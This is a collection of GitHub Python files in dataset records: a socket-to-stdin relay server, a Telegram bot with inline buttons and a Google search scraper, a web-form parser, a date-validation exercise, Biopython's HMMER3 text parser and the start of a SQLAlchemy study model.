termios.tcgetattr(fd)\n if enabled:\n lflag |= termios.ECHO\n else:\n lflag &= ~termios.ECHO\n new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]\n termios.tcsetattr(fd, termios.TCSANOW, new_attr)\n\n# disable terminal echo\nenable_echo(sys.stdin.fileno(), False)\natexit.register(enable_echo, sys.stdin.fileno(), True)\n\n# make stdin a non-blocking file\nfd = sys.stdin.fileno()\nfl = fcntl.fcntl(fd, fcntl.F_GETFL)\nfcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)\n\n# Set up logging\nlogger = logging.getLogger()\nformatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', \"%Y-%m-%d %H:%M:%S\")\n\nif args.debug:\n logger.setLevel(logging.DEBUG)\nelse:\n logger.setLevel(logging.INFO)\n\n# Send logging to the specified logfile, if specified\nif args.log is not None:\n q = Queue.Queue(-1)\n qh = queuehandler.QueueHandler(q)\n fh = logging.FileHandler(args.log)\n ql = queuehandler.QueueListener(q, fh)\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(qh)\n ql.start()\n\n# Don't send anything to the console if we're asked to be quiet\nif not args.quiet:\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\nsl = logging.handlers.SysLogHandler(address='/dev/log')\nslf = logging.Formatter('%(filename)s[%(process)d]: %(message)s')\nsl.setFormatter(slf)\nsl.setLevel(logging.WARNING)\nlogger.addHandler(sl)\n\n# Catch the Keyboard Interrupt\ndef signal_handler(signal, frame):\n logger.warn('caught Ctrl+C. Terminating.')\n if 'ql' in globals():\n ql.stop()\n sys.exit(0)\nsignal.signal(signal.SIGINT, signal_handler)\n\n# Create a TCP/IP socket\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver.setblocking(0)\n\n# Bind the socket to the port\nserver_address = ('', args.port)\nlogger.warn('pid %s starting up on port %s', os.getpid(), server_address)\nserver.bind(server_address)\n\n# Listen for incoming connections\nserver.listen(5)\n\n# Sockets from which we expect to read\ninputs = [ sys.stdin, server ]\n\n# Sockets to which we expect to write\noutputs = [ ]\n\n# Outgoing message queues (socket:Queue)\nmessage_queues = {}\n\n# Queue for stdout\nmessage_queues[sys.stdout] = Queue.Queue()\n\nwhile inputs:\n\n # Wait for at least one of the sockets to be ready for processing\n logger.debug('waiting for the next event')\n readable, writable, exceptional = select.select(inputs, outputs, inputs)\n\n # Handle inputs\n for s in readable:\n\n if s is server:\n # A \"readable\" server socket is ready to accept a connection\n connection, client_address = s.accept()\n logger.warn('new connection from %s', client_address)\n connection.setblocking(0)\n inputs.append(connection)\n\n # Give the connection a queue for data we want to send\n message_queues[connection] = Queue.Queue()\n \n elif s is sys.stdin:\n # Relay data from stdin to all clients\n data = sys.stdin.read(1024)\n logger.info('sys.stdin: %s', data.strip())\n if '\\x04' in data:\n logger.warn('got Ctrl+D. Terminating.')\n raise KeyboardInterrupt\n for client in inputs:\n if client is not sys.stdin and client is not server:\n message_queues[client].put(data)\n # Add output channel for response\n if s not in outputs:\n outputs.append(client) \n \n else:\n data = s.recv(1024)\n if data:\n # A readable client socket has data\n # Relay data from any client to stdout\n logger.info('%s: %s', s.getpeername(), data.strip())\n message_queues[sys.stdout].put(data)\n if sys.stdout not in outputs:\n outputs.append(sys.stdout)\n \n else:\n # Interpret empty result as closed connection\n logger.warn('closing %s after reading no data', client_address)\n # Stop listening for input on the connection\n if s in outputs:\n outputs.remove(s)\n inputs.remove(s)\n s.close()\n\n # Remove message queue\n del message_queues[s]\n\n # Handle outputs\n for s in writable:\n try:\n next_msg = message_queues[s].get_nowait()\n except Queue.Empty:\n # No messages waiting so stop checking for writability.\n if s is sys.stdout:\n sys.stdout.flush()\n logger.debug('output queue for stdout is empty')\n else:\n logger.debug('output queue for %s is empty', s.getpeername())\n outputs.remove(s)\n else:\n if s is sys.stdout:\n logger.debug('writing \"%s\" to stdout' % next_msg)\n s.write(next_msg)\n else:\n logger.debug('sending \"%s\" to %s' % (next_msg, s.getpeername()))\n s.send(next_msg)\n\n # Handle \"exceptional conditions\"\n for s in exceptional:\n logger.error('handling exceptional condition for %s', s.getpeername())\n # Stop listening for input on the connection\n inputs.remove(s)\n if s in outputs:\n outputs.remove(s)\n s.close()\n\n # Remove message queue\n del message_queues[s]\n","repo_name":"peterdey/Yun-Linino-NewBridge","sub_path":"newbridge.py","file_name":"newbridge.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45105634204","text":"from config import *\nimport telebot\n#botones inline\nfrom telebot.types import InlineKeyboardMarkup , InlineKeyboardButton # para crear botonera inline, para definir botones respectivamente\nimport requests\n# from bs4 import BeautifulSoup\n\n\n\n\n#instanciamos el bot de telegram\nbot = telebot.TeleBot(TELEGRAM_TOKEN)\n\n#responde al comando /botones\n@bot.message_handler(commands=['botones'])\ndef cmd_botones(message):\n '''Muestra un mensaje con botones inline(a continuación del mensaje)'''\n markup = InlineKeyboardMarkup (row_width=2) #numero de botones en cada fila(3 por defecto)\n b1 = InlineKeyboardButton ('TOP Descuentazos', url= 'https://t.me/top_descuentazos')\n b2 = InlineKeyboardButton ('TOP AMZ', url= 'https://t.me/top_amz')\n b3 = InlineKeyboardButton ('TOP Todo China', url= 'https://t.me/top_todo_china')\n b4 = InlineKeyboardButton ('TOP Cupones', url= 'https://t.me/top_cupones')\n b5 = InlineKeyboardButton ('TOP Ofertas', url= 'https://t.me/frikidelto_chollos')\n b_cerrar = InlineKeyboardButton('CERRAR',callback_data= 'cerrar')\n markup.add(b1, b2, b3, b4, b5, b_cerrar)\n bot.send_message(message.chat.id, 'Mis canales de ofertas👌', reply_markup = markup)\n\n@bot.callback_query_handler(func = lambda x: True )\ndef respuesta_botones_inline(call):\n '''Gestiona las acciones de los botones callback_data'''\n cid = call.from_user.id\n mid = call.message.id\n if call.data == 'cerrar':\n bot.delete_message(cid, mid)\n\n#responde al comando /buscar\n@bot.message_handler(commands=['buscar'])\ndef cmd_buscar(message):\n '''Realiza una búsqueda en Google y devuelve una lista de resultados\n con la siguiente estructura[[titulo, url],[título, url]....]'''\n texto_buscar = ' '.join(message.text.split()[1:])\n #si no se han pasado parámetros \n if not texto_buscar:\n texto = 'Debes introducir una búsqueda. \\n'\n texto+= 'Ejemplo: \\n'\n texto+= f'{message.text} lionelmessi'\n bot.send_message(message.chat.id, texto, parse_mode ='html')\n return 1\n #si se ha indicado un texto de búsqueda\n else:\n print(f'Buscando en Google: \"{texto_buscar}\"')\n url = f'https://www.google.com/search?q={texto_buscar.replace(\"\", \"+\")}&num=100'\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Unique/93.7.1196.97'\n headers = {'user-agent': user_agent}\n res = request.get(url, headers =headers, timeout = 10)\n if res.status_code!= 200:\n print(f'ERROR al buscar: {res.status_code} {res.reason}')\n bot.send_message(message.chat.id, texto, 'Se ha producido un error. Inténtelo más tarde')\n return 1\n else:\n pass\n # soup = BeautifulSoup(res.text, 'html.parser')\n # elementos = soup.find_all('div', class_='g')\n # lista = []\n # for elemento in elementos:\n # try:\n # titulo = elemento.find('h3').text\n # url = elemento.find('a').attrs.get('href')\n # if not url.startswith('http'):\n # url = 'https://google.es'+ url\n # if [titulo, url] in lista:\n # continue\n # lista.append([titulo, url])\n # except:\n # continue\n # print(lista)\n\n\n#MAIN ####################\nif __name__=='__main__':\n print('Iniciando BOT...')\n #bucle infinito en el que se comprueba si hay nuevos mensajes\n bot.infinity_polling()","repo_name":"kirigarcia/python-example-bot","sub_path":"botones.py","file_name":"botones.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25608600284","text":"# -*- encoding: utf-8 -*-\n\nimport time\n\n\n\n\n\nclass WebForm:\n soup = None\n updateQuery = \"\"\n InsertQuery = \"\"\n\n InputType = [ \"text\", \"email\", \"submit\", \"radio\", \"checkbox\", \"button\", \"number\", \"date\" ]\n InputName = [ \"name\" ]\n InputEmail = [ \"email\" ]\n InputPhone = [ \"phone\" ]\n InputDesc = [ \"comment\" ]\n Elements = [ \"name\", \"email\", \"telephone\", \"phone\", \"comment\" ]\n excludeType = [ \"password\" ]\n InputElement = [ \"input\", \"textarea\" ]\n LastElement = \"\"\n LabelName = \"\"\n url_id = 0\n element_lookup = []\n\n def __init__(self, soup):\n\n self.ProcessPage()\n\n\n\n def ProcessPage(self):\n processData = []\n try:\n forms = self.soup.find_all('form')\n pdata = 0\n nform = 0\n\n for form in forms:\n nform +=1\n formElement = form.find_all()\n nLen = len(formElement)\n i = 0\n for tag in formElement:\n i +=1\n #print \"Form: \" + str(nform) + \" | \"+ str(i) + \"/\" + str(nLen) + \" | \" + tag.name, tag\n data = self.ProcessElement(tag)\n if len(data) > 0:\n data[0] = self.url_id\n data[1] = nform\n #print \"Data -->\", data\n processData.append(data)\n pdata = len(processData)\n self.log.info(\"ProcessData ---> \" + str(pdata)+\"|\" +str(processData))\n except Exception as e:\n print(e, \"Error while reading Soup.\")\n\n return processData\n\n def ProcessElement(self,element):\n DataValues = []\n if ( element.name in self.InputElement ) or ( element.name == 'button' ):\n DataValues = self.GetInputProperties(element)\n # elif ( element.name == 'button' ):\n # DataValues = self.GetButtonProperties(element)\n\n #Should be executed always after processing element\n self.RecordLastElement(element)\n return DataValues\n\n def GetInputProperties(self, element):\n self.element_lookup = []\n\n #print \"Element ----------> \", element\n attr = element.attrs\n\n tag_id = self.GetDictKeyValue( attr, 'id')\n tag_label = self.GetIds( 'label' , self.GetLastLabelName(element))\n tag_name = self.GetIds( 'name' , self.GetDictKeyValue( attr, 'name'))\n tag_placeholder = self.GetIds( 'placeholder', self.GetDictKeyValue( attr, 'placeholder'))\n tag_content = self.GetIds( 'content' , self.GetElementContentName(element))\n\n tag_type = self.GetDictKeyValue( attr, 'type')\n tag_value = self.GetDictKeyValue( attr, 'value')\n element_id = self.GetElementLookupId()\n #cont_url_id, form, tag_name, tag_id, label_id, name_id, placeholder_id, content_id, type, value, element_id, status\n return [0, 0, element.name, tag_id, tag_label, tag_name, tag_placeholder, tag_content, tag_type, tag_value, element_id, 'New' ]\n\n def GetElementLookupId(self):\n resultId = 0\n for id in self.element_lookup:\n if resultId == 0 and id != 0:\n resultId = id\n\n return resultId\n\n def GetIds(self, key, value):\n try:\n resultId = None\n if value != None:\n resultId = None\n args = self.Get_argsId(key, value)\n if (args > 0):\n resultId = args[1]\n self.element_lookup.append(args[2])\n return resultId\n except Exception as e:\n self.log.debug(\"error while getting ID\")\n self.log.info(e)\n\n\n def GetDictKeyValue(self, dictAttr, key):\n keys = dictAttr.keys()\n value = None\n if key in keys:\n value = dictAttr[key].strip()\n return value\n\n def RecordLastElement(self, element):\n if ('span' == element.name ) or ( 'div' == element.name ):\n #print \"Escaping: \" + self.LastElement, self.LabelName\n return\n elif 'label' == element.name:\n self.LastElement = element.name\n self.LabelName = self.GetElementContentName(element)\n else:\n #print element.name, self.LastElement + \" | \" + self.LabelName\n self.LastElement = element.name\n self.LabelName = None\n\n def GetLastLabelName(self, element):\n LabelName = None\n #print element.name in self.InputElement, 'label' == self.LastElement\n if ( element.name in self.InputElement ) and ( 'label' == self.LastElement ):\n LabelName = self.LabelName\n #print LabelName\n return LabelName\n\n def GetElementContentName(self, element):\n try:\n content = element.contents\n labelName = \"\"\n for data in content:\n #if isinstance(data, type(data)):\n if str(type(data)) == \"\":\n labelName += str(data)\n if labelName == \"\":\n labelName = None\n except Exception as e:\n print(\"connection\", e)\n try:\n print(\"Decoding \", e)\n time.sleep(2)\n self.log.warning(str(e),\"Error while building tag content\")\n except Exception as e:\n self.log.error(\"logging error\",e)\n #print e, \"Error while building tag content\"\n\n return labelName\n\n\n def GetTagInfo(self, tag):\n tagName = tag.name\n tagContent = tag.contents\n tagAttr = tag.attrs\n self.ProcessLastElement(tag)\n\n def Get_argsId(self, key, value):\n results_args = []\n if not (value == ''):\n #value = \"Search\"\n #print \"Value ----> \" + argStr + \" | \" + str(type(value)), value\n\n if ( key == 'label'):\n procedure = \"Get_Lookup_Label_Id\"\n elif ( key == 'name'):\n procedure = \"Get_Lookup_Name_Id\"\n elif ( key == 'content'):\n procedure = \"Get_Lookup_Content_Id\"\n elif ( key == 'placeholder'):\n procedure = \"Get_Lookup_Placeholder_Id\"\n\n # con = self.dbConnection(True)\n # results_args = con.callproc(procedure, [value, 0, 0 ] )\n # self.dbConnect.commit()\n # #print \"Result: \", results_args\n return results_args\n\n\n\n\n\n#### DISCARDED CODE START FROM HERE, NOT IN USE. KEPT ONLY FOR REFERENCE\n\n\n\n\n\n def GetPageStrings(self):\n strings = self.soup.strings\n for string in strings:\n if not '\\n' in string:\n print(\"string: \", repr(string))\n\n def SplitElementsfromString(self, elementList):\n SplittedElement = []\n\n for elementString in elementList:\n\n element = str(elementString).split('\\n')\n for e in element:\n SplittedElement.append(e)\n\n return SplittedElement\n\n\n def GetLabelName(self, content):\n label_name = ''\n\n for items in content:\n items = str(items)\n label_name = self.CheckString_InsideList(items.lower(), self.Elements)\n #print \"Label Name: \" + items, label_name\n if label_name:\n #print \"Return: \", label_name\n return label_name\n #break\n return label_name\n\n def CheckString_InsideList(self, DataString, DataList):\n\n for data in DataList:\n #print \"Data: \"+ data, \"DataString: \" + DataString\n #print \"Items: \" + str(type(DataString)),str(DataString)\n\n if data in DataString:\n #print \"Found: \", data\n return data\n\n return ''\n\n\n\n\n\n\n","repo_name":"BizeeGISP/GISPCopy","sub_path":"E2_Form.py","file_name":"E2_Form.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5869684305","text":"\"\"\"\nEjercicio 17c\n\nEscribir funciones que resuelvan los siguientes problemas:\nc) Dada una fecha (dia, mes, año), indicar si es válida o no.\n\"\"\"\n\n\ndef bisiesto(anio):\n if anio % 4:\n return False\n else:\n if anio % 100:\n return True\n else:\n if anio % 400:\n return False\n else:\n return True\n\n\ndef dias_mes(mes, anio):\n if mes in (1, 3, 5, 7, 8, 10, 12):\n return 31\n elif mes in (4, 6, 9, 11):\n return 30\n elif mes == 2:\n if bisiesto(anio):\n return 29\n else:\n return 28\n else:\n return -1\n\n\ndef validar_fecha(dia, mes, anio):\n dm = dias_mes(mes, anio)\n if dm == -1:\n return -1\n if dm < dia:\n return False\n elif mes > 12:\n return False\n else:\n return True\n\n\nprint(validar_fecha(29, 2, 2016), validar_fecha(29, 2, 2017),\n validar_fecha(3, 13, 2016), validar_fecha(5, 6, 1967))\n","repo_name":"mentecatoDev/python","sub_path":"UMDC/03/17c.py","file_name":"17c.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31858783058","text":"import re\n\nfrom Bio.SearchIO._utils import read_forward\nfrom Bio.SearchIO._model import QueryResult, Hit, HSP, HSPFragment\n\nfrom ._base import _BaseHmmerTextIndexer\n\n__all__ = (\"Hmmer3TextParser\", \"Hmmer3TextIndexer\")\n\n\n# precompile regex patterns for faster processing\n# regex for program name capture\n_RE_PROGRAM = re.compile(r\"^# (\\w*hmm\\w+) :: .*$\")\n# regex for version string capture\n_RE_VERSION = re.compile(r\"# \\w+ ([\\w+\\.]+) .*; http.*$\")\n# regex for option string capture\n_RE_OPT = re.compile(r\"^# (.+):\\s+(.+)$\")\n# regex for parsing query id and length, for parsing\n_QRE_ID_LEN_PTN = r\"^Query:\\s*(.*)\\s+\\[\\w=(\\d+)\\]\"\n_QRE_ID_LEN = re.compile(_QRE_ID_LEN_PTN)\n# regex for hsp validation\n_HRE_VALIDATE = re.compile(r\"score:\\s(-?\\d+\\.?\\d+)\\sbits.*value:\\s(.*)\")\n# regexes for parsing hsp alignment blocks\n_HRE_ANNOT_LINE = re.compile(r\"^(\\s+)(.+)\\s(\\w+)\")\n_HRE_ID_LINE = re.compile(r\"^(\\s+\\S+\\s+[0-9-]+ )(.+?)(\\s+[0-9-]+)\")\n\n\nclass Hmmer3TextParser:\n \"\"\"Parser for the HMMER 3.0 text output.\"\"\"\n\n def __init__(self, handle):\n \"\"\"Initialize the class.\"\"\"\n self.handle = handle\n self.line = read_forward(self.handle)\n self._meta = self._parse_preamble()\n\n def __iter__(self):\n \"\"\"Iterate over query results.\"\"\"\n yield from self._parse_qresult()\n\n def _read_until(self, bool_func):\n \"\"\"Read the file handle until the given function returns True (PRIVATE).\"\"\"\n while True:\n if not self.line or bool_func(self.line):\n return\n else:\n self.line = read_forward(self.handle)\n\n def _parse_preamble(self):\n \"\"\"Parse HMMER preamble (lines beginning with '#') (PRIVATE).\"\"\"\n meta = {}\n # bool flag for storing state ~ whether we are parsing the option\n # lines or not\n has_opts = False\n while True:\n # no pound sign means we've left the preamble\n if not self.line.startswith(\"#\"):\n break\n # dashes could either mean we are entering or leaving the options\n # section ~ so it's a switch for the has_opts flag\n elif \"- - -\" in self.line:\n if not has_opts:\n # if flag is false, that means we're entering opts\n # so switch the flag accordingly\n has_opts = True\n else:\n # if flag is true, that means we've reached the end of opts\n # so we can break out of the function\n break\n elif not has_opts:\n # try parsing program\n regx = re.search(_RE_PROGRAM, self.line)\n if regx:\n meta[\"program\"] = regx.group(1)\n # try parsing version\n regx = re.search(_RE_VERSION, self.line)\n if regx:\n meta[\"version\"] = regx.group(1)\n elif has_opts:\n regx = re.search(_RE_OPT, self.line)\n # if target in regx.group(1), then we store the key as target\n if \"target\" in regx.group(1):\n meta[\"target\"] = regx.group(2).strip()\n else:\n meta[regx.group(1)] = regx.group(2)\n\n self.line = read_forward(self.handle)\n\n return meta\n\n def _parse_qresult(self):\n \"\"\"Parse a HMMER3 query block (PRIVATE).\"\"\"\n self._read_until(lambda line: line.startswith(\"Query:\"))\n\n while self.line:\n regx = re.search(_QRE_ID_LEN, self.line)\n\n while not regx:\n self.line = read_forward(self.handle)\n regx = re.search(_QRE_ID_LEN, self.line)\n\n # get query id and length\n qid = regx.group(1).strip()\n # store qresult attributes\n qresult_attrs = {\n \"seq_len\": int(regx.group(2)),\n \"program\": self._meta.get(\"program\"),\n \"version\": self._meta.get(\"version\"),\n \"target\": self._meta.get(\"target\"),\n }\n\n # get description and accession, if they exist\n qdesc = \"\" # placeholder\n while not self.line.startswith(\"Scores for \"):\n self.line = read_forward(self.handle)\n\n if self.line.startswith(\"Accession:\"):\n acc = self.line.strip().split(\" \", 1)[1]\n qresult_attrs[\"accession\"] = acc.strip()\n elif self.line.startswith(\"Description:\"):\n qdesc = self.line.strip().split(\" \", 1)[1].strip()\n qresult_attrs[\"description\"] = qdesc\n\n # parse the query hits\n while self.line and \"//\" not in self.line:\n hit_list = self._parse_hit(qid, qdesc)\n # read through the statistics summary\n # TODO: parse and store this information?\n if self.line.startswith(\"Internal pipeline\"):\n while self.line and \"//\" not in self.line:\n self.line = read_forward(self.handle)\n\n # create qresult, set its attributes and yield\n # not initializing hit_list directly to handle empty hits\n # (i.e. need to set its query description manually)\n qresult = QueryResult(id=qid, hits=hit_list)\n for attr, value in qresult_attrs.items():\n setattr(qresult, attr, value)\n yield qresult\n self.line = read_forward(self.handle)\n\n # Skip line beginning with '# Alignment of', which are output\n # when running phmmer with the '-A' flag.\n if self.line.startswith(\"#\"):\n self.line = self.handle.readline()\n\n # HMMER >= 3.1 outputs '[ok]' at the end of all results file,\n # which means we can break the main loop when we see the line\n if \"[ok]\" in self.line:\n break\n\n def _parse_hit(self, qid, qdesc):\n \"\"\"Parse a HMMER3 hit block, beginning with the hit table (PRIVATE).\"\"\"\n # get to the end of the hit table delimiter and read one more line\n self._read_until(lambda line: line.startswith(\" ------- ------ -----\"))\n self.line = read_forward(self.handle)\n\n # assume every hit is in inclusion threshold until the inclusion\n # threshold line is encountered\n is_included = True\n\n # parse the hit table\n hit_attr_list = []\n while True:\n if not self.line:\n return []\n elif self.line.startswith(\" ------ inclusion\"):\n is_included = False\n self.line = read_forward(self.handle)\n # if there are no hits, then there are no hsps\n # so we forward-read until 'Internal pipeline..'\n elif self.line.startswith(\" [No hits detected that satisfy reporting\"):\n while True:\n self.line = read_forward(self.handle)\n if self.line.startswith(\"Internal pipeline\"):\n assert len(hit_attr_list) == 0\n return []\n elif self.line.startswith(\"Domain annotation for each \"):\n hit_list = self._create_hits(hit_attr_list, qid, qdesc)\n return hit_list\n # entering hit results row\n # parse the columns into a list\n row = [x for x in self.line.strip().split(\" \") if x]\n # join the description words if it's >1 word\n if len(row) > 10:\n row[9] = \" \".join(row[9:])\n # if there's no description, set it to an empty string\n elif len(row) < 10:\n row.append(\"\")\n assert len(row) == 10\n # create the hit object\n hit_attrs = {\n \"id\": row[8],\n \"query_id\": qid,\n \"evalue\": float(row[0]),\n \"bitscore\": float(row[1]),\n \"bias\": float(row[2]),\n # row[3:6] is not parsed, since the info is available\n # at the HSP level\n \"domain_exp_num\": float(row[6]),\n \"domain_obs_num\": int(row[7]),\n \"description\": row[9],\n \"is_included\": is_included,\n }\n hit_attr_list.append(hit_attrs)\n\n self.line = read_forward(self.handle)\n\n def _create_hits(self, hit_attrs, qid, qdesc):\n \"\"\"Parse a HMMER3 hsp block, beginning with the hsp table (PRIVATE).\"\"\"\n # read through until the beginning of the hsp block\n self._read_until(\n lambda line: line.startswith(\"Internal pipeline\") or line.startswith(\">>\")\n )\n\n # start parsing the hsp block\n hit_list = []\n while True:\n if self.line.startswith(\"Internal pipeline\"):\n # by this time we should've emptied the hit attr list\n assert len(hit_attrs) == 0\n return hit_list\n assert self.line.startswith(\">>\")\n hid, hdesc = self.line[len(\">> \") :].split(\" \", 1)\n hdesc = hdesc.strip()\n\n # read through the hsp table header and move one more line\n self._read_until(\n lambda line: line.startswith(\" --- ------ ----- --------\")\n or line.startswith(\" [No individual domains\")\n )\n self.line = read_forward(self.handle)\n\n # parse the hsp table for the current hit\n hsp_list = []\n while True:\n # break out of hsp parsing if there are no hits, it's the last hsp\n # or it's the start of a new hit\n if (\n self.line.startswith(\" [No targets detected that satisfy\")\n or self.line.startswith(\" [No individual domains\")\n or self.line.startswith(\"Internal pipeline statistics summary:\")\n or self.line.startswith(\" Alignments for each domain:\")\n or self.line.startswith(\">>\")\n ):\n hit_attr = hit_attrs.pop(0)\n hit = Hit(hsp_list)\n for attr, value in hit_attr.items():\n if attr == \"description\":\n cur_val = getattr(hit, attr)\n if cur_val and value and cur_val.startswith(value):\n continue\n setattr(hit, attr, value)\n if not hit:\n hit.query_description = qdesc\n hit_list.append(hit)\n break\n\n parsed = [x for x in self.line.strip().split(\" \") if x]\n assert len(parsed) == 16\n # parsed column order:\n # index, is_included, bitscore, bias, evalue_cond, evalue\n # hmmfrom, hmmto, query_ends, hit_ends, alifrom, alito,\n # envfrom, envto, acc_avg\n frag = HSPFragment(hid, qid)\n # set query and hit descriptions if they are defined / nonempty string\n if qdesc:\n frag.query_description = qdesc\n if hdesc:\n frag.hit_description = hdesc\n # HMMER3 results are always protein\n frag.molecule_type = \"protein\"\n # depending on whether the program is hmmsearch, hmmscan, or phmmer\n # {hmm,ali}{from,to} can either be hit_{from,to} or query_{from,to}\n # for hmmscan, hit is the hmm profile, query is the sequence\n if self._meta.get(\"program\") == \"hmmscan\":\n # adjust 'from' and 'to' coordinates to 0-based ones\n frag.hit_start = int(parsed[6]) - 1\n frag.hit_end = int(parsed[7])\n frag.query_start = int(parsed[9]) - 1\n frag.query_end = int(parsed[10])\n elif self._meta.get(\"program\") in [\"hmmsearch\", \"phmmer\"]:\n # adjust 'from' and 'to' coordinates to 0-based ones\n frag.hit_start = int(parsed[9]) - 1\n frag.hit_end = int(parsed[10])\n frag.query_start = int(parsed[6]) - 1\n frag.query_end = int(parsed[7])\n # strand is always 0, since HMMER now only handles protein\n frag.hit_strand = frag.query_strand = 0\n\n hsp = HSP([frag])\n hsp.domain_index = int(parsed[0])\n hsp.is_included = parsed[1] == \"!\"\n hsp.bitscore = float(parsed[2])\n hsp.bias = float(parsed[3])\n hsp.evalue_cond = float(parsed[4])\n hsp.evalue = float(parsed[5])\n if self._meta.get(\"program\") == \"hmmscan\":\n # adjust 'from' and 'to' coordinates to 0-based ones\n hsp.hit_endtype = parsed[8]\n hsp.query_endtype = parsed[11]\n elif self._meta.get(\"program\") in [\"hmmsearch\", \"phmmer\"]:\n # adjust 'from' and 'to' coordinates to 0-based ones\n hsp.hit_endtype = parsed[11]\n hsp.query_endtype = parsed[8]\n # adjust 'from' and 'to' coordinates to 0-based ones\n hsp.env_start = int(parsed[12]) - 1\n hsp.env_end = int(parsed[13])\n hsp.env_endtype = parsed[14]\n hsp.acc_avg = float(parsed[15])\n\n hsp_list.append(hsp)\n self.line = read_forward(self.handle)\n\n # parse the hsp alignments\n if self.line.startswith(\" Alignments for each domain:\"):\n self._parse_aln_block(hid, hit.hsps)\n\n def _parse_aln_block(self, hid, hsp_list):\n \"\"\"Parse a HMMER3 HSP alignment block (PRIVATE).\"\"\"\n self.line = read_forward(self.handle)\n dom_counter = 0\n while True:\n if self.line.startswith(\">>\") or self.line.startswith(\"Internal pipeline\"):\n return hsp_list\n assert self.line.startswith(\" == domain %i\" % (dom_counter + 1))\n # alias hsp to local var\n # but note that we're still changing the attrs of the actual\n # hsp inside the qresult as we're not creating a copy\n frag = hsp_list[dom_counter][0]\n # XXX: should we validate again here? regex is expensive..\n # regx = re.search(_HRE_VALIDATE, self.line)\n # assert hsp.bitscore == float(regx.group(1))\n # assert hsp.evalue_cond == float(regx.group(2))\n hmmseq = \"\"\n aliseq = \"\"\n annot = {}\n self.line = self.handle.readline()\n\n # parse all the alignment blocks in the hsp\n while True:\n regx = None\n\n # check for hit or query line\n # we don't check for the hit or query id specifically\n # to anticipate special cases where query id == hit id\n regx = re.search(_HRE_ID_LINE, self.line)\n if regx:\n # the first hit/query self.line we encounter is the hmmseq\n if len(hmmseq) == len(aliseq):\n hmmseq += regx.group(2)\n # and for subsequent self.lines, len(hmmseq) is either\n # > or == len(aliseq)\n elif len(hmmseq) > len(aliseq):\n aliseq += regx.group(2)\n assert len(hmmseq) >= len(aliseq)\n # check for start of new domain\n elif (\n self.line.startswith(\" == domain\")\n or self.line.startswith(\">>\")\n or self.line.startswith(\"Internal pipeline\")\n ):\n frag.aln_annotation = annot\n if self._meta.get(\"program\") == \"hmmscan\":\n frag.hit = hmmseq\n frag.query = aliseq\n elif self._meta.get(\"program\") in [\"hmmsearch\", \"phmmer\"]:\n frag.hit = aliseq\n frag.query = hmmseq\n dom_counter += 1\n hmmseq = \"\"\n aliseq = \"\"\n annot = {}\n break\n # otherwise check if it's an annotation line and parse it\n # len(hmmseq) is only != len(aliseq) when the cursor is parsing\n # the similarity character. Since we're not parsing that, we\n # check for when the condition is False (i.e. when it's ==)\n elif len(hmmseq) == len(aliseq):\n regx = re.search(_HRE_ANNOT_LINE, self.line)\n if regx:\n annot_name = regx.group(3)\n if annot_name in annot:\n annot[annot_name] += regx.group(2)\n else:\n annot[annot_name] = regx.group(2)\n\n self.line = self.handle.readline()\n\n\nclass Hmmer3TextIndexer(_BaseHmmerTextIndexer):\n \"\"\"Indexer class for HMMER plain text output.\"\"\"\n\n _parser = Hmmer3TextParser\n qresult_start = b\"Query: \"\n qresult_end = b\"//\"\n\n def __iter__(self):\n \"\"\"Iterate over Hmmer3TextIndexer; yields query results' key, offsets, 0.\"\"\"\n handle = self._handle\n handle.seek(0)\n start_offset = handle.tell()\n regex_id = re.compile(_QRE_ID_LEN_PTN.encode())\n\n while True:\n line = read_forward(handle)\n end_offset = handle.tell()\n\n if line.startswith(self.qresult_start):\n regx = re.search(regex_id, line)\n qresult_key = regx.group(1).strip()\n # qresult start offset is the offset of this line\n # (starts with the start mark)\n start_offset = end_offset - len(line)\n elif line.startswith(self.qresult_end):\n yield qresult_key.decode(), start_offset, 0\n start_offset = end_offset\n elif not line:\n break\n\n\n# if not used as a module, run the doctest\nif __name__ == \"__main__\":\n from Bio._utils import run_doctest\n\n run_doctest()\n","repo_name":"biopython/biopython","sub_path":"Bio/SearchIO/HmmerIO/hmmer3_text.py","file_name":"hmmer3_text.py","file_ext":"py","file_size_in_byte":18370,"program_lang":"python","lang":"en","doc_type":"code","stars":3852,"dataset":"github-code","pt":"77"} +{"seq_id":"74177848567","text":"\"\"\" Create the base model of the table study\"\"\"\n# pylint: disable=bad-whitespace, exec-used, eval-used, unused-import\nfrom sqlalchemy import Column\n# Type 'Text' use with extended_db\nfrom sqlalchemy.types import String, Text\n\nfrom sphere.dicmeta.models.core_model import CoreModel\n\n\n# pylint: disable=line-too-long\nclass BaseStudyModel(CoreModel):\n \"\"\" Create study model \"\"\"\n\n KEY = 'studyUID'\n ID = 'id'\n\n id = Column('study_id', CoreModel.ID_TYPE, primary_key=True)\n studyUID = Column('study_uid', String(64), nullable=False, index=True, unique=True)\n patientID = Column('patient_uid', String(64), nullable=False)\n dateStudy = Column('date_study', String(10))\n\n institutionName = Column('institution_name', String(256))\n accessionNumber = Column('accession_number', String(256))\n protocolName = Column('protocol_name', String(512))\n studyDescription = Column('study_description', String(512))\n\n for attribute, size_value in CoreModel.attributes_extended('study'):\n exec(attribute)\n\n # pylint: disable=no-member\n def dict_data(self, include_none=False):\n \"\"\"\n The dictionary of data\n\n :param include_none: If you want to add None so that's True\n otherwise it's False\n :type include_none: bool\n :return: A dictionary\n :rtype: dict\n \"\"\"\n args = {'id': 